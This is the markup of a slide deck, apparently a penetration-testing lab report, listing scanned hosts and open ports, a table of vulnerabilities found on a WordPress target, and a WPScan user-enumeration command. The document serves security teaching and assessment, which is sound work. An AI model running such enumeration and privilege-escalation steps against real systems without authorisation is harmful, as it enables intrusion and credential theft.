            <a:endParaRPr sz="2300" b="1">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192.168.1.115</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22 Open SSH</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80 Open HTTP</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111 Open RPCBind</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139 Open Netbios-SSN</a:t>
            </a:r>
            <a:endParaRPr sz="23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445 Open Microsoft-DS</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168850" y="8181875"/>
            <a:ext cx="4150575" cy="2137575"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpageConnector">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6FA8DC"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="214313" dist="85725" dir="2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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ELK VM</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="2300" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>22 Open SSH</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>9200 Open WAP-WSP</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Google Shape;164;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="6375" b="9747"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10633550" y="1936825"/>
            <a:ext cx="8258750" cy="10200200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="114300" dir="2400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Google Shape;165;p22"/>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7331950" y="2892750"/>
            <a:ext cx="6056425" cy="2662375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="114300" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="Google Shape;166;p2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7331950" y="6110575"/>
            <a:ext cx="6056425" cy="2662375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="114300" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167" name="Google Shape;167;p2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7331950" y="9279825"/>
            <a:ext cx="6056425" cy="2137574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="11430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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="164"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="165"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="165"/>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166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="166"/>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167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="43"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23"/>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6</a:t>
            </a:fld>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7346525" y="5701200"/>
            <a:ext cx="9684600" cy="2313600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB0000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="540303"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="71438" dist="171450" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploits Used</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>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7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p2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rmAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181" name="Google Shape;181;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3183" y="0"/>
            <a:ext cx="24384010" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13961600" y="10797475"/>
            <a:ext cx="9684600" cy="2313600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB0000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="540303"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="71438" dist="171450" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>TARGET “1”</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="0"/>
            <a:ext cx="24443100" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050"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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;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8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301000" y="2685425"/>
            <a:ext cx="23635800" cy="14232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1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000"/>
              <a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="5000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="190" name="Google Shape;190;p25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1052813" y="4751550"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{3F651852-49E8-4B44-9917-7EA4C5F3A083}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7423950">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7423950">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7423950">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1408125">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1660750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>User Enumeration (WordPress site)</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Usernames can be easily revealed from WordPress site</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This exploit lead to brute-force password attack</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060800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak User Password</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Password easily can be cracked</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Credentials access</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1818625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsalted User Password Hash (WordPress database)</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A special character is not added into password hashes</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Makes it easier to gain credentials as the hash is as is without any further alteration</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1060800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Privilege Escalation</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Increase privileges to gain more access</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3300">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Sudo privileges gained</a:t>
                      </a:r>
                      <a:endParaRPr sz="3300">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="ctr">
                    <a:lnL w="38100" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="10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32791" y="0"/>
            <a:ext cx="24443100" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="66675" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation of User Enumeration </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;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rmAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="19383000" cy="2073600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did we exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPScan was used to enumerate users of Target 1 WordPress site</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan --url http://192.168.1.110 --enumerate u</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="198" name="Google Shape;198;p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146310" y="9286139"/>
            <a:ext cx="14803614" cy="3043500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="271463" dist="95250" dir="7080000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="47000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="199" name="Google Shape;199;p2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559925" y="4565850"/>
